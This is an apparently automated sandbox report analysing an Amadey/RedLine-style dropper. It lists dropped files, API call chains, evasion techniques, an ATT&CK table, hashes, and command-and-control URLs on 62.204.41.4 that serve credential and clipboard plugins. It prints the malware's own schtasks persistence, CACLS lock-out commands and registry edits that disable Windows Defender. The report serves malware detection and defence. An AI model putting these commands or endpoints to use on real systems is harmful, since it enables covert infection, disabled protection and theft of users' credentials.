                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-13693
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2449
                              Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2451
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeAPI coverage: 6.7 %
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 50000Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_003D5467
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_003D2390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F32390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00F32390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0121FC58 FindFirstFileExW,14_2_0121FC58
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0121A9A1 mov eax, dword ptr fs:[00000030h]14_2_0121A9A1
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0121CFB2 mov eax, dword ptr fs:[00000030h]14_2_0121CFB2
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0040ADB0 GetProcessHeap,HeapFree,2_2_0040ADB0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D6F40 SetUnhandledExceptionFilter,0_2_003D6F40
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003D6CF0
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F36F40 SetUnhandledExceptionFilter,1_2_00F36F40
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F36CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00F36CF0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_01217A74 SetUnhandledExceptionFilter,14_2_01217A74
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_01217208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_01217208
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0121790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0121790F
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0121BB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0121BB20

                              HIPS / PFW / Operating System Protection Evasion

                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_012038C0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,14_2_012038C0
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /FJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&ExitJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, MainJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /EJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /EJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D18A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_003D18A3
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: GetLocaleInfoA,2_2_00417A20
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_01217AFC cpuid 14_2_01217AFC
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D7155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_003D7155
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_01223C76 _free,_free,_free,GetTimeZoneInformation,_free,14_2_01223C76
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeCode function: 7_2_00007FFDC87B077D GetUserNameA,7_2_00007FFDC87B077D
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_003D2BFB

                              Lowering of HIPS / PFW / Operating System Security Settings

                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior

                              Stealing of Sensitive Information

                              Source: Yara matchFile source: 2.3.aPsf.exe.690000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.aPsf.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.aPsf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.aPsf.exe.660e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.292364966.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000003.267977277.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0.3.file.exe.475dc20.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.file.exe.475dc20.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.0.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.xriv.exe.1200000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 30.0.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 33.0.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 32.0.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 23.2.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 33.2.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 32.2.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 23.0.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.0.xriv.exe.1200000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 30.2.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 6136, type: MEMORYSTR
                              Source: Yara matchFile source: 26.2.rundll32.exe.6ec20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll, type: DROPPED

                              Remote Access Functionality

                              Source: Yara matchFile source: 2.3.aPsf.exe.690000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.aPsf.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.aPsf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.aPsf.exe.660e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.292364966.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000003.267977277.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                              Valid Accounts3
                              Native API
                              1
                              Windows Service
                              2
                              Bypass User Access Control
                              21
                              Disable or Modify Tools
                              1
                              Input Capture
                              2
                              System Time Discovery
                              Remote Services1
                              Archive Collected Data
                              Exfiltration Over Other Network Medium14
                              Ingress Tool Transfer
                              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                              System Shutdown/Reboot
                              Default Accounts2
                              Command and Scripting Interpreter
                              1
                              Scheduled Task/Job
                              1
                              Access Token Manipulation
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              Account Discovery
                              Remote Desktop Protocol1
                              Input Capture
                              Exfiltration Over Bluetooth2
                              Encrypted Channel
                              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                              Domain Accounts1
                              Scheduled Task/Job
                              1
                              Registry Run Keys / Startup Folder
                              1
                              Windows Service
                              2
                              Obfuscated Files or Information
                              Security Account Manager3
                              File and Directory Discovery
                              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                              Non-Application Layer Protocol
                              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                              Local Accounts1
                              Service Execution
                              1
                              Services File Permissions Weakness
                              111
                              Process Injection
                              2
                              Software Packing
                              NTDS36
                              System Information Discovery
                              Distributed Component Object ModelInput CaptureScheduled Transfer113
                              Application Layer Protocol
                              SIM Card SwapCarrier Billing Fraud
                              Cloud AccountsCronNetwork Logon Script1
                              Scheduled Task/Job
                              1
                              Timestomp
                              LSA Secrets131
                              Security Software Discovery
                              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                              Replication Through Removable MediaLaunchdRc.common1
                              Registry Run Keys / Startup Folder
                              2
                              Bypass User Access Control
                              Cached Domain Credentials21
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                              External Remote ServicesScheduled TaskStartup Items1
                              Services File Permissions Weakness
                              1
                              Masquerading
                              DCSync2
                              Process Discovery
                              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
                              Virtualization/Sandbox Evasion
                              Proc Filesystem1
                              System Owner/User Discovery
                              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                              Access Token Manipulation
                              /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)111
                              Process Injection
                              Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                              Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                              Services File Permissions Weakness
                              Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                              Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
                              Rundll32
                              KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                              [Behavior graph: Behavior Graph ID: 800983, Sample: file.exe, Startdate: 07/02/2023, Architecture: WINDOWS, Score: 100]

                              Source | Detection | Scanner | Label
                              file.exe | 66% | ReversingLabs | Win32.Trojan.Amadey
                              file.exe | 100% | Joe Sandbox ML
                              Source | Detection | Scanner | Label
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe | 100% | Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe | 100% | Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe | 100% | Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | 100% | Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | 100% | Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll | 81% | ReversingLabs | Win32.Trojan.Amadey
                              C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | 81% | ReversingLabs | Win32.Spyware.RedLine
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe | 55% | ReversingLabs | Win32.Trojan.Tedy
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | 81% | ReversingLabs | Win32.Spyware.RedLine
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe | 45% | ReversingLabs | Win32.Ransomware.Stop
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe | 82% | ReversingLabs | ByteCode-MSIL.Trojan.Disabler
                              C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll | 81% | ReversingLabs | Win32.Trojan.Amadey
                              No Antivirus matches
                              No Antivirus matches
                              Source | Detection | Scanner | Label
                              http://62.204.41.4/Gol478Ns/index.php79e5342a2 | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/Plugins/cred64.dll | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.php= | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.php$ | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.phpx | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.phpC# | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.phpI# | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.phpEE | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.phpYR | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/Plugins/cred64.dllZkoL | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.phpeC | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.php3# | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.phpsoft | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.php5C | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.php( | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.phpQ | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.phprundll32.exe | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.phpEC:L | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.phpft | 0% | Avira URL Cloud | safe
                              http://62.204.41.4/Gol478Ns/index.phpUC | 0% | Avira URL Cloud | safe
                              62.204.41.4/Gol478Ns/index.php | 100% | Avira URL Cloud | malware
                              http://62.204.41.4/Gol478Ns/index.php | 100% | Avira URL Cloud | malware
                              http://62.204.41.4/Gol478Ns/Plugins/clip64.dll | 100% | Avira URL Cloud | malware
                              No contacted domains info
                              Name | Malicious | Antivirus Detection | Reputation
                              http://62.204.41.4/Gol478Ns/Plugins/cred64.dll | true | Avira URL Cloud: safe | unknown
                              http://62.204.41.4/Gol478Ns/Plugins/clip64.dll | true | Avira URL Cloud: malware | unknown
                              62.204.41.4/Gol478Ns/index.php | true | Avira URL Cloud: malware | low
                              http://62.204.41.4/Gol478Ns/index.php | true | Avira URL Cloud: malware | unknown
                              IP | Domain | Country | ASN | ASN Name | Malicious
                              62.204.41.4 | unknown | United Kingdom | 30798 | TNNET-ASTNNetOyMainnetworkFI | true
                              Joe Sandbox Version:36.0.0 Rainbow Opal
                              Analysis ID:800983
                              Start date and time:2023-02-07 23:05:24 +01:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 12m 21s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:34
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample file name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@37/14@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 65.2% (good quality ratio 62.4%)
                              • Quality average: 84.9%
                              • Quality standard deviation: 24.4%
                              HCA Information:
                              • Successful, ratio: 92%
                              • Number of executed functions: 99
                              • Number of non-executed functions: 122
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240s for rundll32
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              Time | Type | Description
                              23:06:59 | Task Scheduler | Run new task: mnolyk.exe path: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                              23:06:59 | API Interceptor | 2553x Sleep call for process: mnolyk.exe modified
                              Match | Associated Sample Name / URL | Detection | Context
                              62.204.41.4 | file.exe | malicious | 62.204.41.4/Gol478Ns/index.php
                              62.204.41.4 | UUZl6EPjNN.exe | malicious | 62.204.41.4/Gol478Ns/index.php
                              No context
                              Match | Associated Sample Name / URL | Detection | Context
                              TNNET-ASTNNetOyMainnetworkFI | file.exe | malicious | 62.204.41.4
                              TNNET-ASTNNetOyMainnetworkFI | file.exe | malicious | 62.204.41.134
                              No context
                              Match | Associated Sample Name / URL | Detection
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll | file.exe | malicious
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll | UUZl6EPjNN.exe | malicious
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                      File Type:CSV text
                                                                      Category:dropped
                                                                      Size (bytes):226
                                                                      Entropy (8bit):5.354940450065058
                                                                      Encrypted:false
                                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                      MD5:B10E37251C5B495643F331DB2EEC3394
                                                                      SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                      SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                      SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):321
                                                                      Entropy (8bit):5.355221377978991
                                                                      Encrypted:false
                                                                      SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                                                                      MD5:03C5BA5FCE7124B503EA65EF522177C3
                                                                      SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                                                                      SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
